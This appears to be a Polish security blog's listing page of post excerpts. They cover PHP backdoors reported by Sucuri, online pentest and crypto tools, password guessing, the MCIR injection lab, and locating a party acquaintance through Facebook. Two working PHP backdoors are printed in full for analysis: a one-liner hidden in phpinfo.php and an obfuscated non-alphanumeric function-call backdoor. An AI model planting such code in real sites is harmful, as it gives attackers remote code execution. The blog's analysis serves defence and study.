Poraz kolejny dzięki analizie Securi teamu dowiadujemy się o ciekawym backdorze napisanym w PHP [1]. W tym przypadku backdoor został ukryty w pliku phpinfo.php:
@extract ($_REQUEST); @die ($ctime($atime));
Poraz kolejny dzięki analizie Securi teamu dowiadujemy się o ciekawym backdorze napisanym w PHP [1]. W tym przypadku backdoor został ukryty w pliku phpinfo.php:
@extract ($_REQUEST); @die ($ctime($atime));
Nie znasz dnia ani godziny! Kolejne przydatne narzędzie online, które może okazać się pomocne w nagłych sytuacjach: http://www.onlinehexeditor.com/
Tym razem wrzucam link z zakresu kryptografii, który mi często ginie i muszę go odszukiwać na nowo co okazuje się niełatwym zadaniem. Ku pokoleniom: http://crypo.in.ua/tools/
Przydatny zestaw narzędzi do (de)szyfrowania/(de)kodowania/haszowania itp.
Delikatna parodia tytułu ksiązki KM ma zwiastować tym razem wpis poświęcony łamaniu/zgadywaniu haseł.
Podczas testów penetracyjnych nierzadko stajemy przed koniecznością zbadania siły wykorzystywanych w firmie haseł dostępu do rożnego typu usług, paneli aplikacji webowych, etc.
Jak można podejść do problemu, aby nie wykorzystywać terabajtowych słowników ze słowami, na które prawdopodobnie nikt w firmie by nie wpadł?
Nie zawsze jest tak, że możemy wykorzystać maszynę, na której pracujemy do np. przeskanowania portów. Z pomocą przychodzi nam wówczas strona https://pentest-tools.com, na której znajdziemy kilka podstawowych narzędzi takich jak whois, skaner portów, url fuzzer itp.
smacznego!
Gdyby ktoś miał kiedyś problem ze zrozumieniem złożonej komendy shellowej z pomocą może przyjść stronka http://explainshell.com
Chłopaki z Securi zamieścili ostatnio ciekawy wpis [1] zawierający informację o backdoorze napisanym w PHP pozwalającym na wywołanie dowolnej funkcji wraz z dowolnymi parametrami za sprawą wartości przekazanych GET’em. Niby nic ciekawego, a jednak. Ów backdoor został zapisany bez użycia jakichkolwiek znaków alfanumerycznych.
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
Żeby lepiej się czytało dodajmy kilka ‚enterów’. Czytaj dalej
MCIR, czyli The Magical Code Injection Rainbow jest ciekawym frameworkiem treningowym, pozwalającym na budowanie testowych „aplikacji” podatnych na różnego typu wstrzyknięcia.
W jego skład wchodzą:
Link do projektu: https://github.com/SpiderLabs/MCIR
PS: Polecam generalnie zajrzeć do katalogu SpiderWebs (https://github.com/SpiderLabs). Można tam znaleźć dużo innych ciekawych projektów , czy repozytoria (m.in. dodatkowe skrypty do Nmapa).
Ostatnio kumpel był na imprezie, na której poznał fajną dziewczynę… i żyli długo i szczęśliwie ^^. Tak naprawdę znał tylko jej imię i na drugi dzień głowił się jak ją namierzyć. Prościej było wziąć po prostu jej nr, no ale jak to mawiają starożytni kukurgistańczycy: mądry Polak po obiedzie.
W pierwszej kolejności ofc event na facebooku i przeglądanie zaproszonych ludzi, a że spora impreza mógł tak spędzić 2 dni. Stwierdziłem, że sprawdzę jak można by go wspomóc w potrzebie.
Jeśli potrzebujecie analizować kod JS lub HTML, który został skompresowany/zamieszany/zaciemniony, czyli w skrócie jest średnio czytelny polecam:
Na szybko możemy w ten sposób doprowadzić ten kod do wstępnego porządku.